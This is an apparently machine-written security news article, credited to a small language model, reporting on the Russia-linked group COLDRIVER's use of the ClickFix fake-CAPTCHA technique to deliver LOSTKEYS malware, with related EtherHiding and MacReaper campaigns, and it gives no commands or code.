Ethical Hacking News
Russian hackers have been utilizing a novel social engineering tactic called ClickFix as part of an espionage-focused campaign aimed at deploying the LOSTKEYS malware. This malicious scheme has been attributed to COLDRIVER, a Russia-linked threat actor known for its involvement in various cyberespionage activities. To stay protected from such threats, it is crucial to remain informed about emerging trends and tactics used by hackers.
Russian hackers are using a novel social engineering tactic called ClickFix as part of an espionage-focused campaign to deploy the LOSTKEYS malware. LOSTKEYS can steal files, send system information, and run processes to attackers, targeting current and former government advisors, journalists, think tanks, and NGOs. ClickFix is a tactic that lures victims into opening a decoy website with a fake CAPTCHA prompt, then pasting a PowerShell command copied to the clipboard. The ClickFix technique has gained popularity among threat actors in recent months and has been combined with EtherHiding to deliver macOS-based malware. A large-scale watering hole attack called MacReaper compromised 2,800 legitimate websites to serve fake CAPTCHA prompts. Threat actors are adopting ClickFix and EtherHiding tactics to maximize infections and evade detection in virtual machines.
Russian hackers have been observed utilizing a novel social engineering tactic, dubbed ClickFix, as part of an espionage-focused campaign aimed at deploying the LOSTKEYS malware. This malicious scheme has been attributed to COLDRIVER, a Russia-linked threat actor known for its involvement in various cyberespionage activities.
According to Google's Threat Intelligence Group (GTIG), LOSTKEYS is capable of stealing files from a hard-coded list of extensions and directories, as well as sending system information and running processes to the attacker. This malware was observed in attacks on current and former advisors to Western governments and militaries, as well as journalists, think tanks, and NGOs.
LOSTKEYS marks the second custom malware attributed to COLDRIVER after SPICA, which was previously linked to credential phishing campaigns. The hacking group is also tracked under the names Callisto, Star Blizzard, and UNC4057.
In this latest campaign, victims are lured into opening a decoy website containing a fake CAPTCHA verification prompt. Upon completion of this step, the user is instructed to open the Windows Run dialog and paste a PowerShell command copied to the clipboard. This technique, known as ClickFix, has gained popularity among threat actors in recent months.
The next stage involves downloading and executing a third-stage payload from a remote server, which acts as a downloader for a more sophisticated malware payload. This downloader performs checks in an effort to evade execution in virtual machines before deploying LOSTKEYS on the compromised host.
The GTIG further noted that the malware is only deployed selectively, indicating a high level of targeting within these attacks. Google uncovered additional LOSTKEYS artifacts going back to December 2023 that masqueraded as binaries related to the Maltego open-source investigation platform, although it remains unclear whether there are any ties between this malware and COLDRIVER.
Furthermore, the development comes amidst growing concerns surrounding ClickFix's continued adoption by multiple threat actors. This tactic has been combined with another sneaky tactic called EtherHiding, which involves using Binance's Smart Chain (BSC) contracts to conceal the next-stage payload, ultimately leading to the delivery of a macOS information stealer called Atomic Stealer.
In recent months, ClickFix has been employed by attackers in phishing emails bearing ZIP file attachments as lures. Present within the ZIP archive is an HTML file that redirects the message recipient to a fake landing page with ClickFix instructions to launch the multi-stage infection process.
In addition to the LOSTKEYS campaign, other threat actors have adopted ClickFix as part of their malware distribution strategies. For instance, attacks propagating a banking trojan called Lampion use phishing emails bearing ZIP file attachments as lures.
The malicious campaign targeted Portuguese-speaking individuals and organizations in various sectors, including government, finance, and transportation. In recent months, the ClickFix strategy has also been combined with another sneaky tactic called EtherHiding to deliver macOS-based malware.
A large-scale watering hole attack codenamed MacReaper has compromised about 2,800 legitimate websites to serve fake CAPTCHA prompts. The attack leverages obfuscated JavaScript, three full-screen iframes, and blockchain-based command infrastructure to maximize infections.
The use of ClickFix and EtherHiding tactics highlights the evolving sophistication of cyber threats in recent months. As threat actors continue to adopt these strategies, it is essential for individuals and organizations to remain vigilant and take necessary precautions to protect themselves from such malicious campaigns.
Related Information:
https://www.ethicalhackingnews.com/articles/Russian-Hackers-Employ-ClickFix-Fueled-Social-Engineering-Tactics-to-Deploy-LOSTKEYS-Malware-ehn.shtml
https://thehackernews.com/2025/05/russian-hackers-using-clickfix-fake.html
https://cloud.google.com/blog/topics/threat-intelligence/coldriver-steal-documents-western-targets-ngos
https://cybersecuritynews.com/russian-coldriver-hackers-using-lostkeys-malware/
https://securityaffairs.com/58051/hacking/callisto-apt-hacking-team-tools.html
https://www.bleepingcomputer.com/news/security/uk-and-allies-expose-russian-fsb-hacking-group-sanction-members/
Published: Thu May 8 02:38:19 2025 by llama3.2 3B Q4_K_M
